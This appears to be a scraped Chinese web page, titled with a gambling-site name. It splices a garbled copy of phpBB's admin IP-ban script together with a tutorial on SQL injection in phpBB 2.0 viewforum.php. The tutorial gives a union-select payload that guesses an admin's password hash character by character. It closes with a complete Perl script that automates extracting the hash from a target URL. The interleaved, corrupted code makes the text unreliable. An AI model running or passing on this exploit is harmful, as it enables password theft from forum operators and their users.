澳门新葡亰平台游戏网站如何限制访问者的ip(PHPBB的代码)

如何限制访问者的ip(PHPBB的代码)Code:?php/****************************************************************************
admin_user_ban.php* ——————-* begin : Tuesday, Jul 31,
2001* copyright : (C) 2001 The phpBB Group* email :
[email]support@phpbb.com[/email]** $Id: admin_user_ban.php,v
1.21.2.2 2002/05/12 15:57:45 psotfx Exp
$*****************************************************************************//****************************************************************************
This file is part of the phpBB2 port to Nuke 6.0 (c) copyright 2002* by
Tom Nitzschner ([email]tom@toms-home.com[/email])* [url][/url]
(or [url])[/url]** As always, make a backup before messing with
anything. All code* release by me is considered sample code only. It
may be fully* functual, but you use it at your own risk, if you break
it,* you get to fix it too. No waranty is given or implied.** Please
post all questions/request about this port on [url][/url] first,*
then on my site. All original header code and copyright messages will be
maintained* to give credit where credit is due. If you modify this, the
only requirement is* that you also maintain all original copyright
messages. All my work is released* under the GNU GENERAL PUBLIC
LICENSE. Please see the README for more
information.****************************************************************************//*****************************************************************************
This program is free software; you can redistribute it and/or modify*
it under the terms of the GNU General Public License as published by*
the Free Software Foundation; either version 2 of the License, or* (at
your option) any later
version.****************************************************************************/define(‘IN_PHPBB’,
1);if ( !empty($setmodules) ){$filename =
basename(__FILE__);$module[‘Users’][‘Ban_Management’] =
$filename;return;}//// Load default header//$phpbb_root_path =
‘./../’;require($phpbb_root_path .
‘extension.inc’);require(‘./pagestart.’ . $phpEx);//// Start program//if
( isset($HTTP_POST_VARS[‘submit’]) ){$user_bansql =
”;$email_bansql = ”;$ip_bansql = ”;$user_list = array();if (
!empty($HTTP_POST_VARS[‘username’]) ){$this_userdata =
get_userdata($HTTP_POST_VARS[‘username’]);if( !$this_userdata
){message_die(GENERAL_MESSAGE, $lang[‘No_user_id_specified’]
);}$user_list[] = $this_userdata[‘user_id’];}$ip_list =
array();if ( isset($HTTP_POST_VARS[‘ban_ip’]) ){$ip_list_temp =
explode(‘,’, $HTTP_POST_VARS[‘ban_ip’]);for($i = 0; $i
count($ip_list_temp); $i++){if (
preg_match(‘/^([0-9]{1,3})/.([0-9]{1,3})/.([0-9]{1,3})/.([0-9]{1,3})[
]*/-[
]*([0-9]{1,3})/.([0-9]{1,3})/.([0-9]{1,3})/.([0-9]{1,3})$/’,
trim($ip_list_temp[$i]), $ip_range_explode) ){//// Don’t ask about
all this, just don’t ask … !为什么//$ip_1_counter =
$ip_range_explode[1];$ip_1_end = $ip_range_explode[5];while (
$ip_1_counter = $ip_1_end ){$ip_2_counter = ( $ip_1_counter ==
$ip_range_explode[1] ) ? $ip_range_explode[2] : 0;$ip_2_end =
( $ip_1_counter $ip_1_end ) ? 254 : $ip_range_explode[6];if (
$ip_2_counter == 0 && $ip_2_end == 254 ){$ip_2_counter =
255;$ip_2_fragment = 255;$ip_list[] =
encode_ip(“$ip_1_counter.255.255.255”);}while ( $ip_2_counter =
$ip_2_end ){$ip_3_counter = ( $ip_2_counter ==
$ip_range_explode[2] && $ip_1_counter == $ip_range_explode[1]
) ? $ip_range_explode[3] : 0;$ip_3_end = ( $ip_2_counter
$ip_2_end $ip_1_counter $ip_1_end ) ? 254 :
$ip_range_explode[7];if ( $ip_3_counter == 0 && $ip_3_end == 254
){$ip_3_counter = 255;$ip_3_fragment = 255;$ip_list[] =
encode_ip(“$ip_1_counter.$ip_2_counter.255.255”);}while (
$ip_3_counter = $ip_3_end ){$ip_4_counter = ( $ip_3_counter ==
$ip_range_explode[3] && $ip_2_counter == $ip_range_explode[2]
&& $ip_1_counter == $ip_range_explode[1] ) ?
$ip_range_explode[4] : 0;$ip_4_end = ( $ip_3_counter $ip_3_end
$ip_2_counter $ip_2_end ) ? 254 : $ip_range_explode[8];if (
$ip_4_counter == 0 && $ip_4_end == 254 ){$ip_4_counter =
255;$ip_4_fragment = 255;$ip_list[] =
encode_ip(“$ip_1_counter.$ip_2_counter.$ip_3_counter.255”);}while
( $ip_4_counter = $ip_4_end ){$ip_list[] =
encode_ip(“$ip_1_counter.$ip_2_counter.$ip_3_counter.$ip_4_counter”);$ip_4_counter++;}$ip_3_counter++;}$ip_2_counter++;}$ip_1_counter++;}}else
if ( preg_match(‘/^([/w/-_]/.?){2,}$/is’,
trim($ip_list_temp[$i])) ){$ip =
gethostbynamel(trim($ip_list_temp[$i]));for($j = 0; $j count($ip);
$j++){if ( !empty($ip[$j]) ){$ip_list[] =
encode_ip($ip[$j]);}}}else if (
preg_match(‘/^([0-9]{1,3})/.([0-9/*]{1,3})/.([0-9/*]{1,3})/.([0-9/*]{1,3})$/’,
trim($ip_list_temp[$i])) ){$ip_list[] =
encode_ip(str_replace(‘*’, ‘255’,
trim($ip_list_temp[$i])));}}}$email_list = array();if (
isset($HTTP_POST_VARS[‘ban_email’]) ){$email_list_temp =
explode(‘,’, $HTTP_POST_VARS[‘ban_email’]);for($i = 0; $i
count($email_list_temp); $i++){//// This ereg match is based on one by
[email]php@unreelpro.com[/email]// contained in the annotated php
manual at php.com (ereg// section)//if (
eregi(‘^(([[:alnum:]/*]+([-_.][[:alnum:]/*]+)*/.?)|(/*))@([[:alnum:]]+([-_]?[[:alnum:]]+)*/.){1,3}([[:alnum:]]{2,6})$’,
trim($email_list_temp[$i])) ){$email_list[] =
trim($email_list_temp[$i]);}}}$sql = “SELECT *FROM ” .
BANLIST_TABLE;if ( !($result = $db-sql_query($sql))
){message_die(GENERAL_ERROR, “Couldn’t obtain banlist information”,
“”, __LINE__, __FILE__, $sql);}$current_banlist =
$db-sql_fetchrowset($result);$db-sql_freeresult($result);$kill_session_sql
= ”;for($i = 0; $i count($user_list); $i++){$in_banlist =
false;for($j = 0; $j count($current_banlist); $j++){if (
$user_list[$i] == $current_banlist[$j][‘ban_userid’]
){$in_banlist = true;}}if ( !$in_banlist ){$kill_session_sql .= ( (
$kill_session_sql != ” ) ? ‘ OR ‘ : ” ) . “session_user_id = ” .
$user_list[$i];$sql = “INSERT INTO ” . BANLIST_TABLE . ”
(ban_userid)VALUES (” . $user_list[$i] . “)”;if (
!$db-sql_query($sql) ){message_die(GENERAL_ERROR, “Couldn’t insert
ban_userid info into database”, “”, __LINE__, __FILE__,
$sql);}}}for($i = 0; $i count($ip_list); $i++){$in_banlist =
false;for($j = 0; $j count($current_banlist); $j++){if (
$ip_list[$i] == $current_banlist[$j][‘ban_ip’] ){$in_banlist =
true;}}if ( !$in_banlist ){if ( preg_match(‘/(ff/.)|(/.ff)/is’,
chunk_split($ip_list[$i], 2, ‘.’)) ){$kill_ip_sql = “session_ip
LIKE ‘” . str_replace(‘.’, ”, preg_replace(‘/(ff/.)|(/.ff)/is’, ‘%’,
chunk_split($ip_list[$i], 2, “.”))) . “‘”;}else{$kill_ip_sql =
“session_ip = ‘” . $ip_list[$i] . “‘”;}$kill_session_sql .= ( (
$kill_session_sql != ” ) ? ‘ OR ‘ : ” ) . $kill_ip_sql;$sql =
“INSERT INTO ” . BANLIST_TABLE . ” (ban_ip)VALUES (‘” .
$ip_list[$i] . “‘)”;if ( !$db-sql_query($sql)
){message_die(GENERAL_ERROR, “Couldn’t insert ban_ip info into
database”, “”, __LINE__, __FILE__, $sql);}}}//// Now we’ll
delete all entries from the session table with any of the banned// user
or IP info just entered into the ban table … this will force a
session// initialisation resulting in an instant ban//if (
$kill_session_sql != ” ){$sql = “DELETE FROM ” . SESSIONS_TABLE .
“WHERE $kill_session_sql”;if ( !$db-sql_query($sql)
){message_die(GENERAL_ERROR, “Couldn’t delete banned sessions from
database”, “”, __LINE__, __FILE__, $sql);}}for($i = 0; $i
count($email_list); $i++){$in_banlist = false;for($j = 0; $j
count($current_banlist); $j++){if ( $email_list[$i] ==
$current_banlist[$j][‘ban_email’] ){$in_banlist = true;}}if (
!$in_banlist ){$sql = “INSERT INTO ” . BANLIST_TABLE . ”
(ban_email)VALUES (‘” . str_replace(“‘”, “””, $email_list[$i]) .
“‘)”;if ( !$db-sql_query($sql) ){message_die(GENERAL_ERROR, “Couldn’t
insert ban_email info into database”, “”, __LINE__, __FILE__,
$sql);}}}$where_sql = ”;if ( isset($HTTP_POST_VARS[‘unban_user’])
){$user_list = $HTTP_POST_VARS[‘unban_user’];for($i = 0; $i
count($user_list); $i++){if ( $user_list[$i] != -1 ){$where_sql .=
( ( $where_sql != ” ) ? ‘, ‘ : ” ) . $user_list[$i];}}}if (
isset($HTTP_POST_VARS[‘unban_ip’]) ){$ip_list =
$HTTP_POST_VARS[‘unban_ip’];for($i = 0; $i count($ip_list);
$i++){if ( $ip_list[$i] != -1 ){$where_sql .= ( ( $where_sql != ”
) ? ‘, ‘ : ” ) . $ip_list[$i];}}}if (
isset($HTTP_POST_VARS[‘unban_email’]) ){$email_list =
$HTTP_POST_VARS[‘unban_email’];for($i = 0; $i count($email_list);
$i++){if ( $email_list[$i] != -1 ){$where_sql .= ( ( $where_sql !=
” ) ? ‘, ‘ : ” ) . $email_list[$i];}}}if ( $where_sql != ” ){$sql
= “DELETE FROM ” . BANLIST_TABLE . “WHERE ban_id IN ($where_sql)”;if
( !$db-sql_query($sql) ){message_die(GENERAL_ERROR, “Couldn’t delete
ban info from database”, “”, __LINE__, __FILE__,
$sql);}}$message = $lang[‘Ban_update_sucessful’] . ‘br /br /’ .
sprintf($lang[‘Click_return_banadmin’], ‘a href=”‘ .
append_sid(“admin_user_ban.$phpEx”) . ‘”‘, ‘/a’) . ‘br /br /’ .
sprintf($lang[‘Click_return_admin_index’], ‘a href=”‘ .
append_sid(“index.$phpEx?pane=right”) . ‘”‘,
‘/a’);message_die(GENERAL_MESSAGE,
$message);}else{$template-set_filenames(array(‘body’ =
‘admin/user_ban_body.tpl’));$template-assign_vars(array(‘L_BAN_TITLE’
= $lang[‘Ban_control’],’L_BAN_EXPLAIN’ =
$lang[‘Ban_explain’],’L_BAN_EXPLAIN_WARN’ =
$lang[‘Ban_explain_warn’],’L_IP_OR_HOSTNAME’ =
$lang[‘IP_hostname’],’L_EMAIL_ADDRESS’ =
$lang[‘Email_address’],’L_SUBMIT’ = $lang[‘Submit’],’L_RESET’ =
$lang[‘Reset’],’S_BANLIST_ACTION’ =
append_sid(“admin_user_ban.$phpEx”)));$template-assign_vars(array(‘L_BAN_USER’
= $lang[‘Ban_username’],’L_BAN_USER_EXPLAIN’ =
$lang[‘Ban_username_explain’],’L_BAN_IP’ =
$lang[‘Ban_IP’],’L_BAN_IP_EXPLAIN’ =
$lang[‘Ban_IP_explain’],’L_BAN_EMAIL’ =
$lang[‘Ban_email’],’L_BAN_EMAIL_EXPLAIN’ =
$lang[‘Ban_email_explain’]));$userban_count = 0;$ipban_count =
0;$emailban_count = 0;$sql = “SELECT b.ban_id, u.user_id,
u.usernameFROM ” . BANLIST_TABLE . ” b, ” . USERS_TABLE . ” uWHERE
u.user_id = b.ban_useridAND b.ban_userid 0AND u.user_id ” .
ANONYMOUS . “ORDER BY u.user_id ASC”;if ( !($result =
$db-sql_query($sql)) ){message_die(GENERAL_ERROR, ‘Could not select
current user_id ban list’, ”, __LINE__, __FILE__,
$sql);}$user_list =
$db-sql_fetchrowset($result);$db-sql_freeresult($result);$select_userlist
= ”;for($i = 0; $i count($user_list); $i++){$select_userlist .=
‘option value=”‘ . $user_list[$i][‘ban_id’] . ‘”‘ .
$user_list[$i][‘username’] . ‘/option’;$userban_count++;}if(
$select_userlist == ” ){$select_userlist = ‘option value=”-1″‘ .
$lang[‘No_banned_users’] . ‘/option’;}$select_userlist = ‘select
name=”unban_user[]” multiple=”multiple” size=”5″‘ . $select_userlist
. ‘/select’;$sql = “SELECT ban_id, ban_ip, ban_emailFROM ” .
BANLIST_TABLE;if ( !($result = $db-sql_query($sql))
){message_die(GENERAL_ERROR, ‘Could not select current ip ban list’,
”, __LINE__, __FILE__, $sql);}$banlist =
$db-sql_fetchrowset($result);$db-sql_freeresult($result);$select_iplist
= ”;$select_emaillist = ”;for($i = 0; $i count($banlist);
$i++){$ban_id = $banlist[$i][‘ban_id’];if (
!empty($banlist[$i][‘ban_ip’]) ){$ban_ip = str_replace(‘255’,
‘*’, decode_ip($banlist[$i][‘ban_ip’]));$select_iplist .=
‘option value=”‘ . $ban_id . ‘”‘ . $ban_ip .
‘/option’;$ipban_count++;}else if (
!empty($banlist[$i][‘ban_email’]) ){$ban_email =
$banlist[$i][‘ban_email’];$select_emaillist .= ‘option value=”‘ .
$ban_id . ‘”‘ . $ban_email . ‘/option’;$emailban_count++;}}if (
$select_iplist == ” ){$select_iplist = ‘option value=”-1″‘ .
$lang[‘No_banned_ip’] . ‘/option’;}if ( $select_emaillist == ” )
{$select_emaillist = ‘option value=”-1″‘ . $lang[‘No_banned_email’]
. ‘/option’;}$select_iplist = ‘select name=”unban_ip[]”
multiple=”multiple” size=”5″‘ . $select_iplist .
‘/select’;$select_emaillist = ‘select name=”unban_email[]”
multiple=”multiple” size=”5″‘ . $select_emaillist .
‘/select’;$template-assign_vars(array(‘L_UNBAN_USER’ =
$lang[‘Unban_username’],’L_UNBAN_USER_EXPLAIN’ =
$lang[‘Unban_username_explain’],’L_UNBAN_IP’ =
$lang[‘Unban_IP’],’L_UNBAN_IP_EXPLAIN’ =
$lang[‘Unban_IP_explain’],’L_UNBAN_EMAIL’ =
$lang[‘Unban_email’],’L_UNBAN_EMAIL_EXPLAIN’ =
$lang[‘Unban_email_explain’], ‘L_USERNAME’ = $lang[‘Username’],
‘L_LOOK_UP’ = $lang[‘Look_up_User’],’L_FIND_USERNAME’ =
$lang[‘Find_username’],’U_SEARCH_USER’ =
append_sid(“search.$phpEx?mode=searchuser&popup=1&menu=1”),
‘S_UNBAN_USERLIST_SELECT’ =
$select_userlist,’S_UNBAN_IPLIST_SELECT’ =
$select_iplist,’S_UNBAN_EMAILLIST_SELECT’ =
$select_emaillist,’S_BAN_ACTION’ =
append_sid(“admin_user_ban.$phpEx”)));}$template-pparse(‘body’);include(‘./page_footer_admin.’.$phpEx);?

如何限制访问者的ipCode:sql_query{message_die(GENERAL_ERROR, “Couldn’t
obtain banlist information”, “”, __LINE__, __FILE__,
$sql);}$current_banlist =
$db->sql_fetchrowset;$db->sql_freeresult;$kill_session_sql =
”;for($i = 0; $i < count{$in_banlist = false;for($j = 0; $j <
count; $j++){if ( $user_list[$i] ==
$current_banlist[$j][‘ban_userid’] ){$in_banlist = true;}}if
{$kill_session_sql .= ( ( $kill_session_sql != ” ) ? ‘ OR ‘ : ” )
. “session_user_id = ” . $user_list[$i];$sql = “INSERT INTO ” .
BANLIST_TABLE . ” VALUES (” . $user_list[$i] . “)”;if (
!$db->sql_query{message_die(GENERAL_ERROR, “Couldn’t insert
ban_userid info into database”, “”, __LINE__, __FILE__,
$sql);}}}for($i = 0; $i < count{$in_banlist = false;for($j = 0; $j
< count; $j++){if ( $ip_list[$i] ==
$current_banlist[$j][‘ban_ip’] ){$in_banlist = true;}}if {if
|/is’, chunk_split) ){$kill_ip_sql = “session_ip LIKE ‘” .
str_replace(‘.’, ”, preg_replace/is’, ‘%’, chunk_split)) .
“‘”;}else{$kill_ip_sql = “session_ip = ‘” . $ip_list[$i] .
“‘”;}$kill_session_sql .= ( ( $kill_session_sql != ” ) ? ‘ OR ‘ :
” ) . $kill_ip_sql;$sql = “INSERT INTO ” . BANLIST_TABLE . ” VALUES
(‘” . $ip_list[$i] . “‘)”;if (
!$db->sql_query{message_die(GENERAL_ERROR, “Couldn’t insert
ban_ip info into database”, “”, __LINE__, __FILE__,
$sql);}}}//// Now we’ll delete all entries from the session table with
any of the banned// user or IP info just entered into the ban table …
this will force a session// initialisation resulting in an instant
ban//if ( $kill_session_sql != ” ){$sql = “DELETE FROM ” .
SESSIONS_TABLE . “WHERE $kill_session_sql”;if (
!$db->sql_query{message_die(GENERAL_ERROR, “Couldn’t delete banned
sessions from database”, “”, __LINE__, __FILE__, $sql);}}for($i
= 0; $i < count{$in_banlist = false;for($j = 0; $j < count;
$j++){if ( $email_list[$i] == $current_banlist[$j][‘ban_email’]
){$in_banlist = true;}}if {$sql = “INSERT INTO ” . BANLIST_TABLE . ”
VALUES (‘” . str_replace(“‘”, “””, $email_list[$i]) . “‘)”;if (
!$db->sql_query{message_die(GENERAL_ERROR, “Couldn’t insert
ban_email info into database”, “”, __LINE__, __FILE__,
$sql);}}}$where_sql = ”;if ( isset($HTTP_POST_VARS[‘unban_user’])
){$user_list = $HTTP_POST_VARS[‘unban_user’];for($i = 0; $i <
count{if ( $user_list[$i] != -1 ){$where_sql .= ? ‘, ‘ : ” ) .
$user_list[$i];}}}if ( isset($HTTP_POST_VARS[‘unban_ip’])
){$ip_list = $HTTP_POST_VARS[‘unban_ip’];for($i = 0; $i <
count{if {$where_sql .= ? ‘, ‘ : ” ) . $ip_list[$i];}}}if (
isset($HTTP_POST_VARS[‘unban_email’]) ){$email_list =
$HTTP_POST_VARS[‘unban_email’];for($i = 0; $i < count{if (
$email_list[$i] != -1 ){$where_sql .= ? ‘, ‘ : ” ) .
$email_list[$i];}}}if {$sql = “DELETE FROM ” . BANLIST_TABLE .
“WHERE ban_id IN “;if (
!$db->sql_query{message_die(GENERAL_ERROR, “Couldn’t delete ban
info from database”, “”, __LINE__, __FILE__, $sql);}}$message =
$lang[‘Ban_update_sucessful’] . ‘

php注入实例
在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而
php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql
njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││
isset($HTTP_POST_VARS<pOST_FORUM_URL]) ) {
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ?
intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

‘ . sprintf($lang[‘Click_return_banadmin’], ”,
”) . ‘

($HTTP_POST_VARS<pOST_FORUM_URL]);
} else if ( isset($HTTP_GET_VARS[‘forum’])) {
$forum_id = $HTTP_GET_VARS[‘forum’];
} else {
$forum_id = ”;
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) ) {
$sql = “Select *
FROM ” . FORUMS_TABLE . “
Where forum_id = $forum_id”;
if ( !($result = $db->sql_query($sql)) ) {
message_die(GENERAL_ERROR, ‘Could not obtain forums information’, ”,
__LINE__, __FILE__, $sql);
}
} else {
message_die(GENERAL_MESSAGE, ‘Forum_not_exist’);
}

‘ . sprintf($lang[‘Click_return_admin_index’], ”,
”);message_die(GENERAL_MESSAGE,
$message);}else{$template->set_filenames(array(‘body’ =>
‘admin/user_ban_body.tpl’));$template->assign_vars(array(‘L_BAN_TITLE’
=> $lang[‘Ban_control’],’L_BAN_EXPLAIN’ =>
$lang[‘Ban_explain’],’L_BAN_EXPLAIN_WARN’ =>
$lang[‘Ban_explain_warn’],’L_IP_OR_HOSTNAME’ =>
$lang[‘IP_hostname’],’L_EMAIL_ADDRESS’ =>
$lang[‘Email_address’],’L_SUBMIT’ => $lang[‘Submit’],’L_RESET’
=> $lang[‘Reset’],’S_BANLIST_ACTION’ =>
append_sid(“admin_user_ban.$phpEx”)));$template->assign_vars(array(‘L_BAN_USER’
=> $lang[‘Ban_username’],’L_BAN_USER_EXPLAIN’ =>
$lang[‘Ban_username_explain’],’L_BAN_IP’ =>
$lang[‘Ban_IP’],’L_BAN_IP_EXPLAIN’ =>
$lang[‘Ban_IP_explain’],’L_BAN_EMAIL’ =>
$lang[‘Ban_email’],’L_BAN_EMAIL_EXPLAIN’ =>
$lang[‘Ban_email_explain’]));$userban_count = 0;$ipban_count =
0;$emailban_count = 0;$sql = “SELECT b.ban_id, u.user_id,
u.usernameFROM ” . BANLIST_TABLE . ” b, ” . USERS_TABLE . ” uWHERE
u.user_id = b.ban_useridAND b.ban_userid <> 0AND u.user_id
<> ” . ANONYMOUS . “ORDER BY u.user_id ASC”;if ( !($result =
$db->sql_query{message_die(GENERAL_ERROR, ‘Could not select
current user_id ban list’, ”, __LINE__, __FILE__,
$sql);}$user_list =
$db->sql_fetchrowset;$db->sql_freeresult;$select_userlist =
”;for($i = 0; $i < count{$select_userlist .= ” .
$user_list[$i][‘username’] . ”;$userban_count++;}if(
$select_userlist == ” ){$select_userlist = ” .
$lang[‘No_banned_users’] . ”;}$select_userlist = ” .
$select_userlist . ”;$sql = “SELECT ban_id, ban_ip, ban_emailFROM ”
. BANLIST_TABLE;if ( !($result =
$db->sql_query{message_die(GENERAL_ERROR, ‘Could not select
current ip ban list’, ”, __LINE__, __FILE__, $sql);}$banlist =
$db->sql_fetchrowset;$db->sql_freeresult;$select_iplist =
”;$select_emaillist = ”;for($i = 0; $i < count{$ban_id =
$banlist[$i][‘ban_id’];if ( !empty($banlist[$i][‘ban_ip’])
){$ban_ip = str_replace(‘255’, ‘*’,
decode_ip($banlist[$i][‘ban_ip’]));$select_iplist .= ” .
$ban_ip . ”;$ipban_count++;}else if (
!empty($banlist[$i][‘ban_email’]) ){$ban_email =
$banlist[$i][‘ban_email’];$select_emaillist .= ” . $ban_email .
”;$emailban_count++;}}if ( $select_iplist == ” ){$select_iplist =
” . $lang[‘No_banned_ip’] . ”;}if ( $select_emaillist == ” )
{$select_emaillist = ” . $lang[‘No_banned_email’] .
”;}$select_iplist = ” . $select_iplist . ”;$select_emaillist = ”
. $select_emaillist .
”;$template->assign_vars(array(‘L_UNBAN_USER’ =>
$lang[‘Unban_username’],’L_UNBAN_USER_EXPLAIN’ =>
$lang[‘Unban_username_explain’],’L_UNBAN_IP’ =>
$lang[‘Unban_IP’],’L_UNBAN_IP_EXPLAIN’ =>
$lang[‘Unban_IP_explain’],’L_UNBAN_EMAIL’ =>
$lang[‘Unban_email’],’L_UNBAN_EMAIL_EXPLAIN’ =>
$lang[‘Unban_email_explain’], ‘L_USERNAME’ =>
$lang[‘Username’], ‘L_LOOK_UP’ =>
$lang[‘Look_up_User’],’L_FIND_USERNAME’ =>
$lang[‘Find_username’],’U_SEARCH_USER’ =>
append_sid(“search.$phpEx?mode=searchuser&popup=1&menu=1”),
‘S_UNBAN_USERLIST_SELECT’ =>
$select_userlist,’S_UNBAN_IPLIST_SELECT’ =>
$select_iplist,’S_UNBAN_EMAILLIST_SELECT’ =>
$select_emaillist,’S_BAN_ACTION’ =>
append_sid(“admin_user_ban.$phpEx”)));}$template->pparse;include(‘./page_footer_admin.’.$phpEx);?>

如果是asp的话,相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话,就会使$result为空,于是返回Could
not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn’t return any rows this isn’t a valid forum.
Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) ) {
message_die(GENERAL_MESSAGE, ‘Forum_not_exist’);
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id)
/****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip,
$thispage_id),这是在session.php中定义的一个函数,由于代码太

长,就不全贴出来了,有兴趣的可以自已看看,关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id,
$user_ip,

$thispage_id, TRUE)),同样是在这个文件中定义的,其中有如下代码
$sql = “Update ” . SESSIONS_TABLE . “
SET session_user_id = $user_id, session_start = $current_time,
session_time = $current_time, session_page =

$page_id, session_logged_in = $login
Where session_id = ‘” . $session_id . “‘
AND session_ip = ‘$user_ip'”;
if ( !($result = $db->sql_query($sql)) ││
!$db->sql_affectedrows() ) {
$session_id = md5(uniqid($user_ip));

$sql = “Insert INTO ” . SESSIONS_TABLE . “
(session_id, session_user_id, session_start, session_time,
session_ip, session_page,

session_logged_in)
VALUES (‘$session_id’, $user_id, $current_time, $current_time,
‘$user_ip’, $page_id, $login)”;
if ( !($result = $db->sql_query($sql)) ) {
message_die(CRITICAL_ERROR, ‘Error creating new session :
session_begin’, ”, __LINE__, __FILE__,

$sql);
}

在这里有个session_page在mysql中定义的是个整形数,他的値$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session :
session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定
为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,
没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii
码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数,插入的不
是整数当然就要出错了,于是就显示Error creating new session :
session_begin,就表明你猜对了第一位了,其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功,看来出错信息也很有帮助啊.分析就到这里,下面附上一段测试代码,这段代码只要稍加修
改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件,中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print ” ***********************n”;
print ” phpbb viewforum.php expn”;
print ” code by pinkeyesn”;
print ” www.icehack.comn”;
print ” ************************n”;
print “please enter the weak file’s url:n”;
print “e.g. “;
$adr=<STDIN>;
chomp($adr);
print “please enter the user_id that you want to crackn”;
$u=<STDIN>;
chomp($u);
print “work starting,please wait!n”;
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr.”?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]”;
$request = HTTP::Request->new(‘GET’, “$url”);
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print “$pwdn”;
}

}
}
}
if ($pwd ne “”){
print “successfully,The password is $pwd,good luckn”;}
else{
print “bad luck,work failed!n”;}

You can leave a response, or trackback from your own site.

Leave a Reply

网站地图xml地图